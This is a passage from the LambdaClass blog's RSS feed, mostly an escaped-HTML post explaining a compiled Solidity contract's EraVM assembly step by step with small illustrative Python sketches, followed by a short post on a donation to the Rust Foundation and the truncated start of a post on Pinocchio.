&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	sub!	r1, r0, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	jump.ne	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	32, r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	st.2	256, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	st.2	288, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	@CPI0_0[0], r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	ret.ok.to_label	r1, @DEFAULT_FAR_RETURN&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.BB0_10:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	context.get_context_u128	r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	sub!	r1, r0, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	jump.ne	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	99, r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	st.1	128, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	@CPI0_4[0], r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	ret.ok.to_label	r1, @DEFAULT_FAR_RETURN&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.BB0_2:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	add	r0, r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	ret.revert.to_label	r1, @DEFAULT_FAR_REVERT&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.func_end0:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.note.GNU-stack&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.rodata&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;CPI0_0:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.cell	53919893334301279589334030174039261352344891250716429051063678533632&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;CPI0_1:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.cell	340282366604025813406317257057592410112&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;CPI0_2:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.cell	1519042605&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;CPI0_3:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.cell	1039457780&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;CPI0_4:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	.cell	2535301202817642044428229017600&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;A few things you need to know about the EraVM before diving in:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The native word is a &lt;code&gt;U256&lt;&#x2F;code&gt; (256-bit unsigned integer).&lt;&#x2F;li&gt;
&lt;li&gt;There are 16 registers, &lt;code&gt;r0&lt;&#x2F;code&gt; through &lt;code&gt;r15&lt;&#x2F;code&gt;.
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;r0&lt;&#x2F;code&gt; is the zero register: writing to it does nothing, reading from it yields zero.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;r1&lt;&#x2F;code&gt; is used as a pointer to the calldata (i.e. function arguments) when calling other contracts, and to the returndata when returning from calls.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;code&gt;r2&lt;&#x2F;code&gt; usually stores information about whether the current call is a constructor call, a regular function call, or a system call (a call to a system contract with special privileges).&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;Every contract call gets its own stack and heap memory.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h3 id=&quot;step-by-step&quot;&gt;Step by Step&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s do a step by step overview of this assembly.&lt;&#x2F;p&gt;
&lt;p&gt;When someone calls this contract, execution always begins from the &lt;code&gt;__entry&lt;&#x2F;code&gt; symbol. The first two instructions do some setup we don’t care much about, storing the value &lt;code&gt;128&lt;&#x2F;code&gt; into the &lt;code&gt;r3&lt;&#x2F;code&gt; register:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;add	128, r0, r3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;st.1 64, r3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In more detail, &lt;code&gt;add 128, r0, r3&lt;&#x2F;code&gt; adds &lt;code&gt;128&lt;&#x2F;code&gt; to the value in &lt;code&gt;r0&lt;&#x2F;code&gt; and stores the result in &lt;code&gt;r3&lt;&#x2F;code&gt;. Because &lt;code&gt;r0&lt;&#x2F;code&gt; is the zero register, this is essentially storing &lt;code&gt;128&lt;&#x2F;code&gt; in &lt;code&gt;r3&lt;&#x2F;code&gt; (this is the way &lt;code&gt;mov&lt;&#x2F;code&gt;s to registers are always done in the EraVM).&lt;br &#x2F;&gt;
&lt;code&gt;st.1&lt;&#x2F;code&gt; then stores the value in &lt;code&gt;r3&lt;&#x2F;code&gt; to memory address &lt;code&gt;64&lt;&#x2F;code&gt; (if you’re wondering what the &lt;code&gt;1&lt;&#x2F;code&gt; is in &lt;code&gt;st.1&lt;&#x2F;code&gt;, it’s the type of heap to use; the EraVM has both a regular and a special &lt;em&gt;auxiliary&lt;&#x2F;em&gt; heap).&lt;&#x2F;p&gt;
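&lt;p&gt;The zero-register convention is easy to model. Here is a minimal Python sketch (illustrative only, not how the VM is implemented) where &lt;code&gt;add imm, r0, rX&lt;&#x2F;code&gt; behaves exactly like a &lt;code&gt;mov&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# Minimal model of EraVM registers (illustrative sketch): r0 reads as&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# zero and ignores writes, so `add imm, r0, rX` acts as a mov.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;class Registers:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    def __init__(self):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        self.regs = [0] * 16&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    def read(self, i):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        return 0 if i == 0 else self.regs[i]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    def write(self, i, value):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if i != 0:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            self.regs[i] = value % 2**256  # the native word is a U256&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;def add(regs, imm, src, dst):&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    regs.write(dst, imm + regs.read(src))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;regs = Registers()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;add(regs, 128, 0, 3)  # add 128, r0, r3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;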
&lt;p&gt;Then, there’s a check on the &lt;code&gt;r2&lt;&#x2F;code&gt; register and a conditional jump:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;and! 1, r2, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;jump.ne	@.BB0_1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The &lt;code&gt;and!&lt;&#x2F;code&gt; instruction does a bitwise &lt;code&gt;and&lt;&#x2F;code&gt; between &lt;code&gt;1&lt;&#x2F;code&gt; and &lt;code&gt;r2&lt;&#x2F;code&gt;, stores the result in &lt;code&gt;r0&lt;&#x2F;code&gt;, and sets the zero flag accordingly. It stores to &lt;code&gt;r0&lt;&#x2F;code&gt; because we don’t care about the result; we are just checking whether the lowest bit of &lt;code&gt;r2&lt;&#x2F;code&gt; is set. If it is, this is a constructor call and we jump to block &lt;code&gt;@.BB0_1&lt;&#x2F;code&gt;, which contains the constructor logic; if it’s not, we continue.&lt;&#x2F;p&gt;
&lt;p&gt;If the call is not a constructor call, the code will then do&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;add	r1, r0, r2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;and!	@CPI0_1[0], r2, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;jump.eq	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This puts the &lt;code&gt;calldata&lt;&#x2F;code&gt; pointer that’s in &lt;code&gt;r1&lt;&#x2F;code&gt; into &lt;code&gt;r2&lt;&#x2F;code&gt;, then does an &lt;code&gt;and&lt;&#x2F;code&gt; instruction and a conditional jump to make sure it’s not pointing to an invalid address. If it is, then execution jumps to block &lt;code&gt;@.BB0_2&lt;&#x2F;code&gt;, which contains the revert logic:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.BB0_2:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  add	r0, r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ret.revert.to_label	r1, @DEFAULT_FAR_REVERT&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If the address is valid, the code follows like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ld	r1, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;shr.s	224, r1, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This loads the first 32 bytes that the calldata pointer points to through an &lt;code&gt;ld&lt;&#x2F;code&gt; instruction, stores them in &lt;code&gt;r1&lt;&#x2F;code&gt;, then shifts the word &lt;code&gt;224&lt;&#x2F;code&gt; bits to the right to keep only its first 4 bytes (&lt;code&gt;256 - 224 = 32&lt;&#x2F;code&gt; bits = 4 bytes).&lt;&#x2F;p&gt;
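&lt;p&gt;The same two steps can be reproduced outside the VM. A small Python sketch (illustrative only), using the selector of the &lt;code&gt;second()&lt;&#x2F;code&gt; function as the example calldata:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# Illustrative: load the first 32-byte calldata word, then shift right&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# 224 bits to keep only the 4-byte function selector.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;calldata = bytes.fromhex(&amp;#39;5a8ac02d&amp;#39;) + bytes(28)  # selector + padding&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;word = int.from_bytes(calldata[:32], &amp;#39;big&amp;#39;)  # like `ld r1, r1`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;selector = word &amp;gt;&amp;gt; 224  # like `shr.s 224, r1, r1`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;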
&lt;p&gt;These 4 bytes are the &lt;em&gt;function selector&lt;&#x2F;em&gt; of this contract call. This &lt;code&gt;default.sol&lt;&#x2F;code&gt; contract has two functions&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;function first() public pure returns(uint64)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;function second() public pure returns(uint256)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The selector for the first one is &lt;code&gt;0x3df4ddf4&lt;&#x2F;code&gt;, while for the second one it’s &lt;code&gt;0x5a8ac02d&lt;&#x2F;code&gt; (you can check them yourself &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.evm-function-selector.click&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;). If you convert these values to decimal, you’ll see they are the values for the labels &lt;code&gt;CPI0_3&lt;&#x2F;code&gt; and &lt;code&gt;CPI0_2&lt;&#x2F;code&gt; respectively in the assembly. That’s why the code does a &lt;code&gt;sub.s!&lt;&#x2F;code&gt; instruction, comparing the selector in &lt;code&gt;r1&lt;&#x2F;code&gt; against &lt;code&gt;CPI0_2&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;sub.s!	@CPI0_2[0], r1, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;jump.eq	@.BB0_10&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
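&lt;p&gt;You can check the decimal correspondence yourself, e.g. in Python:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# The .cell constants in the assembly are just these selectors written&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;# in decimal:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;assert 0x5a8ac02d == 1519042605  # CPI0_2, selector of second()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;assert 0x3df4ddf4 == 1039457780  # CPI0_3, selector of first()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;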
&lt;p&gt;If the value matches, execution jumps to block &lt;code&gt;.BB0_10&lt;&#x2F;code&gt;, containing the logic for the &lt;code&gt;second&lt;&#x2F;code&gt; function that just returns &lt;code&gt;99&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.BB0_10:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  context.get_context_u128	r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  sub!	r1, r0, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  jump.ne	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  add	99, r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  st.1	128, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  add	@CPI0_4[0], r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  ret.ok.to_label	r1, @DEFAULT_FAR_RETURN&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;You can see the &lt;code&gt;add 99, r0, r1&lt;&#x2F;code&gt; followed by &lt;code&gt;st.1 128, r1&lt;&#x2F;code&gt; to store the return value into memory. The code before it is just checking whether the caller passed any &lt;code&gt;wei&lt;&#x2F;code&gt; using the &lt;code&gt;context.get_context_u128 r1&lt;&#x2F;code&gt; instruction, and reverting if so (this function is not payable).&lt;&#x2F;p&gt;
&lt;p&gt;If the selector did not match &lt;code&gt;CPI0_2&lt;&#x2F;code&gt; (the selector for the &lt;code&gt;second()&lt;&#x2F;code&gt; function), the code then checks against the &lt;code&gt;first()&lt;&#x2F;code&gt; selector (label &lt;code&gt;CPI0_3&lt;&#x2F;code&gt;):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;sub.s!	@CPI0_3[0], r1, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;jump.ne	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In this case, because it’s the last valid function selector for the contract, if the value does not match we just go to the revert block &lt;code&gt;BB0_2&lt;&#x2F;code&gt;. If it does match we continue with the logic for the &lt;code&gt;first()&lt;&#x2F;code&gt; function, doing the same but returning &lt;code&gt;42&lt;&#x2F;code&gt; instead of &lt;code&gt;99&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;context.get_context_u128	r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;sub!	r1, r0, r0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;jump.ne	@.BB0_2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;add	42, r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;st.1	128, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;add	@CPI0_4[0], r0, r1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ret.ok.to_label	r1, @DEFAULT_FAR_RETURN&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;And that’s it, that’s the entire EraVM assembly code for this contract. To summarize, the code is organized as follows:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;__entry&lt;&#x2F;code&gt; block is the entrypoint for any call to this contract.&lt;&#x2F;li&gt;
&lt;li&gt;Block &lt;code&gt;BB0_1&lt;&#x2F;code&gt; contains the contract’s constructor logic (the default one in this case, since we didn’t write one ourselves).&lt;&#x2F;li&gt;
&lt;li&gt;Block &lt;code&gt;BB0_10&lt;&#x2F;code&gt; contains the code for the &lt;code&gt;second()&lt;&#x2F;code&gt; function.&lt;&#x2F;li&gt;
&lt;li&gt;Block &lt;code&gt;BB0_2&lt;&#x2F;code&gt; just has the revert logic.&lt;&#x2F;li&gt;
&lt;li&gt;When someone calls this contract the code will do, in order, the following:
&lt;ul&gt;
&lt;li&gt;Check whether this is a constructor call and jump to &lt;code&gt;BB0_1&lt;&#x2F;code&gt; if so.&lt;&#x2F;li&gt;
&lt;li&gt;Read from the &lt;code&gt;calldata&lt;&#x2F;code&gt; pointer, reverting by jumping to &lt;code&gt;BB0_2&lt;&#x2F;code&gt; if the address it points to is invalid.&lt;&#x2F;li&gt;
&lt;li&gt;Get the first 4 bytes of calldata to obtain the function selector.&lt;&#x2F;li&gt;
&lt;li&gt;Check the provided selector against the &lt;code&gt;second()&lt;&#x2F;code&gt; selector stored in &lt;code&gt;CPI0_2&lt;&#x2F;code&gt;. Jump to block &lt;code&gt;BB0_10&lt;&#x2F;code&gt; if it matches.&lt;&#x2F;li&gt;
&lt;li&gt;Check whether the selector matches &lt;code&gt;first()&lt;&#x2F;code&gt;. Revert if it does not; run the code for &lt;code&gt;first()&lt;&#x2F;code&gt; otherwise.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h2 id=&quot;current-status-and-next-steps&quot;&gt;Current status and next steps&lt;&#x2F;h2&gt;
&lt;p&gt;We are working on the last stretch of fixes to make all tests pass. Once that’s done, our focus will shift entirely to benchmarking the VM and making optimizations. In anticipation of this, we started integrating with the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;matter-labs&#x2F;zksync-era&#x2F;tree&#x2F;main&#x2F;core&#x2F;tests&#x2F;vm-benchmark&quot;&gt;ZKsync Era benchmarks&lt;&#x2F;a&gt;. This work requires &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;zksync-era&#x2F;pull&#x2F;225&quot;&gt;integrating the VM with the &lt;code&gt;bootloader&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;, the contract in ZKsync that executes blocks (essentially the network’s main execution entrypoint).&lt;&#x2F;p&gt;
&lt;p&gt;This bootloader integration will also allow us to get our VM plugged into a ZKsync operator and start playing around with optimistic parallel execution ideas. Actually, getting parallel execution will probably involve modifying the bootloader or getting rid of it altogether when executing on the operator, but that’s a topic for another post.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Giving Back: The Rust Foundation</title>
          <pubDate>Wed, 31 Jul 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/giving-back-the-rust-foundation/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/giving-back-the-rust-foundation/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/giving-back-the-rust-foundation/">&lt;p&gt;We recently contributed $100,000 to the Rust Foundation and would like to share the reasoning behind our decision and the process that led us to this commitment.&lt;&#x2F;p&gt;
&lt;p&gt;A slice of Lambda’s history is that it started as a group of engineers with experience working on scalable and fault-tolerant systems. One of our main tools was (and still is) the Erlang&#x2F;Elixir ecosystem, which is an extraordinary solution for certain categories of problems and allows easy extension by writing C code behind an FFI. However, many of the fault-tolerance properties provided by the platform are put at risk when linking with C code. We viewed Rust as an excellent complement that would allow us to get the best of both worlds.&lt;br &#x2F;&gt;
In time, we found the areas Rust excels in, and today many of our production systems rely on the language and the community behind the tools and libraries we use.&lt;&#x2F;p&gt;
&lt;p&gt;Another slice of our history is that Lambda hails from South America, specifically from Argentina, a place where tech companies are often something of an underdog. What many people do not know is that some of our strengths are directly related to this. Argentina boasts a public education system that allows anyone to get a higher education. Many of Lambda’s employees are also professors working at several universities. We work together with them to teach Rust, ensuring a healthy hiring pool and improving future possibilities for all students.&lt;&#x2F;p&gt;
&lt;p&gt;In short, we are proud to give back to the community that helped us grow, grateful to the Rust Foundation for channeling contributions, and we hope to continue contributing as our means allow.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2025&#x2F;12&#x2F;rustlatam-everyone.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Pinocchio: verifiable computation revisited</title>
          <pubDate>Wed, 31 Jul 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/pinocchio-verifiable-computation-revisited/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/pinocchio-verifiable-computation-revisited/</guid>
